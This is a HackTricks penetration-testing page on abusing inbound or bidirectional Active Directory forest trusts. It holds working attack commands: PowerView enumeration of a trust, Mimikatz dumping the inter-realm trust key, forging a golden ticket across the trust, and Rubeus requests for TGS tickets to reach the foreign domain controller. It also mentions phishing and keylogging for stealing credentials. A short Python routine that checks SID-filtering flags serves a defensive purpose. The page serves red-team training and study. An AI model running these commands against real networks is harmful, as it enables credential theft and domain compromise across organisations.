hacktricks/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
2023-08-03 19:12:22 +00:00


External Forest Domain - One-Way (Inbound) or Bidirectional

In this scenario an external domain trusts you (or both domains trust each other), so you can get some kind of access to it.

Enumeration

First of all, you need to enumerate the trust:

```powershell
Get-DomainTrust
SourceName      : a.domain.local   --> Current domain
TargetName      : domain.external  --> Destination domain
TrustType       : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection  : Inbound          --> Inbound trust
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM

# Get the name of the DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName
dnshostname
-----------
dc.domain.external

# Groups that contain users from outside their domain, and their members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain             : domain.external
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain            : domain.external
MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,DC=external

# Get the name of the principal in the current domain that is a member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins

# Get the members of the cross-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName
MemberName
----------
crossuser

# Let's list local group members
## Check how "External Admins" is part of the Administrators group on that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName    : Administrators
MemberName   : SUB\External Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True

# You may also enumerate where foreign groups and/or users have been assigned
# local admin access via Restricted Groups by enumerating the GPOs in the foreign domain.
```

In the previous enumeration it was found that the user **crossuser is inside the External Admins group, which has administrator access on the DC of the external domain**.

Initial access

If you couldn't find any special access for your user in the other domain, you can still go back to the AD methodology and try to escalate privileges from an unprivileged user (for example with kerberoasting).

You can use PowerView functions to enumerate the other domain with the -Domain parameter, as in:

```powershell
Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
```

Impersonation

Logging in

Using a regular method with the credentials of the user who has access to the external domain, you should be able to access it:

```powershell
Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
```

SID History abuse

You could also abuse SID History across a domain trust.

If a user is migrated from one domain to another and SID filtering is not enabled, it becomes possible to add a SID from the other domain, and that SID will be added to the user's token when authenticating across the trust.
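The enumeration output above shows an empty TrustAttributes field, and the paragraph above hinges on whether SID filtering is enabled. As an added example (not code from the original page or from PowerView), this Python snippet decodes the raw trustAttributes/trustDirection values of a trustedDomain object (flag values from MS-ADTS) and reports whether foreign SIDs are quarantined at the trust boundary, which is the check a defender would run before worrying about SID History injection. The TrustedDomain record is a constructed stand-in for an LDAP result read from the trusting side.

```python
from dataclasses import dataclass

# trustAttributes bit flags (MS-ADTS 6.1.6.7.9)
TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",      # SID filtering explicitly enforced
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",
    0x0040: "TREAT_AS_EXTERNAL",       # relaxes SID filtering on a forest trust
    0x0080: "USES_RC4_ENCRYPTION",     # inter-realm key is RC4 (weak)
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
}
# trustDirection values (MS-ADTS 6.1.6.7.12)
TRUST_DIRECTION = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}


@dataclass
class TrustedDomain:
    """Minimal stand-in for an LDAP trustedDomain object (constructed)."""
    partner: str
    direction: int
    attributes: int


def decode_attributes(value: int) -> list:
    """Names of every trustAttributes bit set in `value`, lowest bit first."""
    return [name for bit, name in TRUST_ATTRIBUTES.items() if value & bit]


def sid_filtering_state(attrs: int) -> str:
    """Interpretation of the flags: quarantined > forest-wide filtering > none."""
    if attrs & 0x0004:
        return "quarantined"            # netdom trust ... /quarantine:Yes
    if attrs & 0x0008:
        # forest trusts filter by default; TREAT_AS_EXTERNAL weakens that
        return "weakened" if attrs & 0x0040 else "forest-filtered"
    return "unfiltered"                 # SID History from the partner is honoured


def assess(trust: TrustedDomain) -> dict:
    state = sid_filtering_state(trust.attributes)
    return {
        "partner": trust.partner,
        "direction": TRUST_DIRECTION.get(trust.direction, f"unknown({trust.direction})"),
        "flags": decode_attributes(trust.attributes),
        "sid_filtering": state,
        "rc4_trust_key": bool(trust.attributes & 0x0080),
        "sid_history_risk": state == "unfiltered",
    }


# Constructed record mirroring the Get-DomainTrust output above: inbound, no attributes set.
SAMPLE = TrustedDomain(partner="domain.external", direction=1, attributes=0)

if __name__ == "__main__":
    for key, val in assess(SAMPLE).items():
        print(f"{key:>17}: {val}")
```

An empty TrustAttributes therefore means no quarantine flag is set, which is exactly the condition the SID History paragraph describes.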

{% hint style="warning" %} As a reminder, you can get the signing key with:

```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local
```

{% endhint %}

You could sign with the trusted key a TGT impersonating the user of the current domain.

```powershell
# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking for CIFS of the external DC because in the enumeration we saw the group was part of the local Administrators group
Rubeus.exe asktgs /service:cifs/dc.domain.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap

# Now you have a TGS to access the CIFS service of the domain controller
```

Full way of impersonating the user

In this technique, we impersonate a user in order to gain access to their account: obtain the user's credentials (the text names phishing, keylogging or password cracking), log in with their username and password, and then perform the actions that user is authorized to do, such as accessing sensitive information, modifying settings or sending emails.

It is important to note that impersonating a user without their consent is illegal and unethical. This technique should only be used for legitimate purposes, such as penetration testing or authorized security assessments.

```bash
# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking for CIFS of the external DC because in the enumeration we saw the group was part of the local Administrators group
Rubeus.exe asktgs /service:cifs/dc.domain.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Now you have a TGS to access the CIFS service of the domain controller
```